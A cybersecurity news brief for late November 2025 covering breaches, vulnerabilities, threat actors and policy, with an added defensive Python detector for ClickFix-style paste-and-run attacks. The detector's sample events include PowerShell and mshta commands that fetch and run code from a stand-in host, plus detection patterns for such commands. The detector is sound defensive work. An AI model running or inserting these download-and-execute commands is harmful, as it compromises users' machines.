Cybersecurity Brief – 2025-11-26
Major Incidents or Breaches
- Dartmouth College disclosed a data breach after the Clop extortion gang leaked data allegedly stolen from Oracle E-Business Suite servers.
- The OnSolve CodeRED platform suffered a cyberattack disrupting emergency notification systems used by state and local governments, police departments, and schools across the US.
- Major US banks were affected by a breach of SitusAMC, a third-party real-estate finance services provider, which exposed corporate data such as accounting records and legal agreements. No ransomware was deployed; the impact is a third-party data theft rather than an outage.
- Harvard University confirmed a compromise of a system containing alumni, donor, student, and staff information, following a phone phishing attack.
- Researchers found that credentials, including passwords and API keys, had been leaking for years because staff at banks, government agencies, and tech firms pasted sensitive data into public online tools such as JSONFormatter and CodeBeautify, where saved snippets remained publicly retrievable.
Newly Discovered Vulnerabilities
- Five vulnerabilities in Fluent Bit, an open source logging tool widely deployed in cloud and Kubernetes environments, were disclosed; they potentially enable path traversal, remote code execution, denial of service, and manipulation of log tags (and therefore of where records are routed) in the cloud services that depend on it.
- Researchers demonstrated a hardware module that bypasses AMD and Intel memory encryption, undermining the confidential-computing guarantee that a physically present attacker cannot read VM memory. The attack requires physical access to the host, so it breaks the threat model rather than a remote attack surface.
- WhatsApp closed an API loophole in its contact-discovery endpoint that had allowed researchers to enumerate roughly 3.5 billion accounts and scrape their profile photos and "about" text. The weakness was missing rate limiting rather than a code-execution bug.
Notable Threat Actor Activity
- The Clop extortion gang claimed the Dartmouth College breach noted above, leaking data it says was taken by exploiting Oracle E-Business Suite servers.
- ToddyCat, a known threat actor, deployed new tools including TCSectorCopy to steal Outlook email data and Microsoft 365 access tokens from corporate targets.
- The DPRK-linked operators behind "FlexibleFerret" continued to refine social engineering and credential theft against macOS users, notably in the "Contagious Interview" campaign that targets job seekers.
- Chinese state-linked hackers targeted Russian IT organizations using commercial cloud services for command and control to evade detection.
- Russian threat actors targeted a US engineering firm due to its work for a Ukrainian sister city, but the attack was detected before causing operational impact.
- Iranian cyber operations were linked to “cyber-enabled kinetic targeting,” aiding real-world missile strikes by providing targeting support.
- CISA issued warnings about spyware campaigns focusing on high-value messaging app users.
- A new ClickFix variant, dubbed "JackFix", used fake Windows Update pop-ups on adult sites to pressure victims into pasting commands, delivering multiple stealers and circumventing earlier mitigations; a related variant hid its payload inside PNG images.
- A campaign was observed in which Blender Foundation 3D asset (.blend) files were weaponized to deliver StealC V2 information-stealing malware.
- The "Shai-Hulud" supply-chain attack infected more than 640 npm packages with a self-replicating worm that runs at install time; when it cannot propagate (for example, because it finds no usable npm or GitHub credentials), it erases the victim's home directory.
Trends, Tools, or Tactics of Interest
- The FBI reported a surge in account takeover (ATO) fraud, with cybercriminals impersonating bank support teams and stealing over $262 million since January 2025.
- Researchers and the FBI cite a rise in AI-driven phishing and holiday-themed scams, with threat actors leveraging AI to scale attacks, automate reconnaissance, and craft highly convincing lures.
- Malicious large language models (LLMs) such as WormGPT 4 and KawaiiGPT are being used by cybercriminals for phishing, malware development, and reconnaissance.
- Sophisticated phishing campaigns continue to bypass layered enterprise security controls, so user-facing defenses such as phishing-resistant MFA remain the practical backstop.
- The ClickFix/JackFix campaigns combine psychological pressure, such as fake Windows Update screens, with technical evasion, such as payloads hidden inside PNG images, to raise infection rates.
- The use of public code beautifier and formatter tools as inadvertent credential leak vectors is a persistent issue across multiple sectors.
- Threat actors are increasingly exploiting supply chain weaknesses, as seen in the 2025 systemic ransomware events affecting Jaguar Land Rover and other automotive manufacturers.
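ClickFix lures differ in their pretext (JackFix's fake Windows Update is one), but they end the same way: the victim pastes a command into the Win+R Run box or the Explorer address bar, and that command runs as a child of explorer.exe. The following is an added example, not code from any of the reports above: a small scoring rule over Sysmon-style process-creation events (Event ID 1 field names) that anchors on the explorer.exe parent and adds weight for command-line traits typical of these lures. The weights, the threshold and the five sample events are constructed for illustration and need tuning against a real environment.

```python
"""Score process-creation events for ClickFix-style execution (added example)."""
import json
import re

LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
           "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe",
           "rundll32.exe", "regsvr32.exe", "msiexec.exe"}

# (pattern, weight, label). Weights are a tuning starting point, not ground truth.
INDICATORS = [
    (re.compile(r"(?i)-(?:w|window|windowstyle)\s+hidden"), 2, "hidden window"),
    (re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"), 2, "encoded command"),
    (re.compile(r"(?i)\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b"),
     2, "download-and-execute cmdlet"),
    (re.compile(r"(?i)mshta(?:\.exe)?\s+\S*(?:https?:|javascript:|vbscript:)"), 2, "mshta remote or script payload"),
    (re.compile(r"(?i)https?://"), 1, "remote URL"),
    (re.compile(r"(?i)-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass"), 1, "profile/policy bypass"),
]
RUN_BOX_PARENT_WEIGHT = 2   # child of explorer.exe: Run dialog or address-bar paste
ALERT_THRESHOLD = 4


def basename(path):
    """Last path component, lower-cased, for Windows or POSIX separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons) for one process-creation event."""
    image = basename(ev.get("Image", ""))
    if image not in LOLBINS:
        return 0, []          # only script hosts and downloaders are scored
    score, reasons = 0, []
    if basename(ev.get("ParentImage", "")) == "explorer.exe":
        score += RUN_BOX_PARENT_WEIGHT
        reasons.append("spawned by explorer.exe (Run box / address bar)")
    cmdline = ev.get("CommandLine", "")
    for rx, weight, label in INDICATORS:
        if rx.search(cmdline):
            score += weight
            reasons.append(label)
    return score, reasons


def detect(events, threshold=ALERT_THRESHOLD):
    """Return an alert record for every event at or above the threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"user": ev.get("User"), "image": basename(ev.get("Image", "")),
                           "score": score, "reasons": reasons, "command": ev.get("CommandLine")})
    return alerts


def parse_events(text):
    """One JSON object per line, as an EDR or SIEM export would give it."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


# Constructed sample events: two ClickFix-style pastes, an admin running
# PowerShell from an editor, notepad, and a user opening an intranet URL via Run.
SAMPLE_LOG = r"""
{"User": "CORP\\alice", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -w hidden -nop -c \"iex (irm https://example.invalid/upd)\""}
{"User": "CORP\\bob", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta.exe https://example.invalid/update.hta"}
{"User": "CORP\\carol", "ParentImage": "C:\\Users\\carol\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"}
{"User": "CORP\\dave", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt"}
{"User": "CORP\\erin", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c start msedge https://intranet.example/"}
"""


def run_demo():
    return detect(parse_events(SAMPLE_LOG))


if __name__ == "__main__":
    for a in run_demo():
        print(f"{a['score']:2} {a['user']:12} {a['image']:15} {', '.join(a['reasons'])}")
```

The threshold of 4 is what keeps the last sample (a user launching a browser from the Run box) from alerting on the explorer.exe parent plus a URL alone; expect to tune the weights per environment. Process events are one artifact; the `RunMRU` key under `HKCU\...\Explorer\RunMRU` records what was typed into the Run dialog and is the natural corroborating source during triage.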
Regulatory or Policy Developments Affecting the Security Industry
- Tor announced the adoption of Counter Galois Onion (CGO), a new relay encryption scheme that replaces the legacy tor1 design and is built to resist tagging attacks on circuit traffic.
- US Immigration and Customs Enforcement (ICE) raised the cap on its immigrant-tracking program, offering up to $280 million to private surveillance firms, expanding the scope of surveillance-related contracts.